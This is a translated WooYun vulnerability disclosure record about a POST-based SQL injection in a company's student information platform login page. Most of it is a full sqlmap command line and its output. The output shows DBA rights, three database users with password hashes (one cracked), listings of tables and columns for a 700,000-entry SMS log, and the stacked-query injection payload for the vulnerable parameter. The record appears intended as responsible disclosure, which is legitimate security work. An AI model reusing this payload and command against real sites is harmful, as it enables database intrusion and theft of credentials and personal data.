WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
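2015-12-03: Details reported to the vendor; awaiting vendor handling
2015-12-07: Vendor confirmed; details disclosed to the vendor only
2015-12-17: Details disclosed to core white hats and experts in related fields
2015-12-27: Details disclosed to regular white hats
2016-01-06: Details disclosed to intern white hats
2016-01-18: Details disclosed to the public
Chengdu Changli Hexin Technology Co., Ltd. (成都长力和信科技有限公司) student information platform has a POST-based SQL injection vulnerability (DBA privileges + system administrator password + 217 tables + 700,000 mobile message send log entries)
URL: http://**.**.**.**/public/login.aspx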
$ python sqlmap.py -u "http://**.**.**.**/public/login.aspx" -p xxbma --technique=B --form --random-agent --batch -D jxt -T MobileSendLog --columns --count --current-user --is-dba --users --passwords
current user: 'asianpeng'
current user is DBA: True
database management system users [3]:
[*] asianpeng
[*] esk
[*] sa
database management system users password hashes:
[*] asianpeng [1]:
    password hash: 0x010086030ab7cb31ab7fc3d4b8d2a89093438c140c8108aee4bc
        header: 0x0100
        salt: 86030ab7
        mixedcase: cb31ab7fc3d4b8d2a89093438c140c8108aee4bc
[*] esk [1]:
    password hash: 0x0100aa4e0d9547840c6a3668d3aff14883fda2289eceadbbae84
        header: 0x0100
        salt: aa4e0d95
        mixedcase: 47840c6a3668d3aff14883fda2289eceadbbae84
    clear-text password: esk
[*] sa [1]:
    password hash: 0x01004086ceb694708f6c97df5631796b1db93ab5b933957419c5
        header: 0x0100
        salt: 4086ceb6
        mixedcase: 94708f6c97df5631796b1db93ab5b933957419c5
Database: jxt
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| dbo.MobileSendLog | 707951  |
+-------------------+---------+
Database: jxt
Table: MobileSendLog
[16 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| bj_id         | int      |
| Content       | varchar  |
| CreateDate    | datetime |
| DelaySendTime | varchar  |
| Flag          | tinyint  |
| ID            | int      |
| lb_id         | int      |
| Mobile        | varchar  |
| mobileKind    | int      |
| RealSendTime  | datetime |
| SendDate      | datetime |
| SentTime      | tinyint  |
| smsNumber     | int      |
| SP_provider   | tinyint  |
| xxid          | varchar  |
| zh_id         | int      |
+---------------+----------+
Database: jxt
[217 tables]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxbma (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] esk_db
[*] jxt
[*] master
[*] model
[*] msdb
[*] tempdb
Database: jxt
Table: AttendanceSMSStatus
[17 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| classid       | int      |
| classname     | varchar  |
| content       | varchar  |
| describe      | varchar  |
| gradeid       | int      |
| gradename     | varchar  |
| id            | int      |
| mterrcode     | varchar  |
| mtmsgid       | varchar  |
| mtstat        | varchar  |
| receiveid     | int      |
| receivemobile | varchar  |
| receivename   | varchar  |
| schoolid      | int      |
| schoolname    | varchar  |
| sendname      | varchar  |
| sendtime      | datetime |
+---------------+----------+
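Deploy a WAF.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-07 18:14
CNVD did not directly reproduce the described vulnerability and has not yet established a direct handling channel with the organization that administers the website; awaiting claim.
None yet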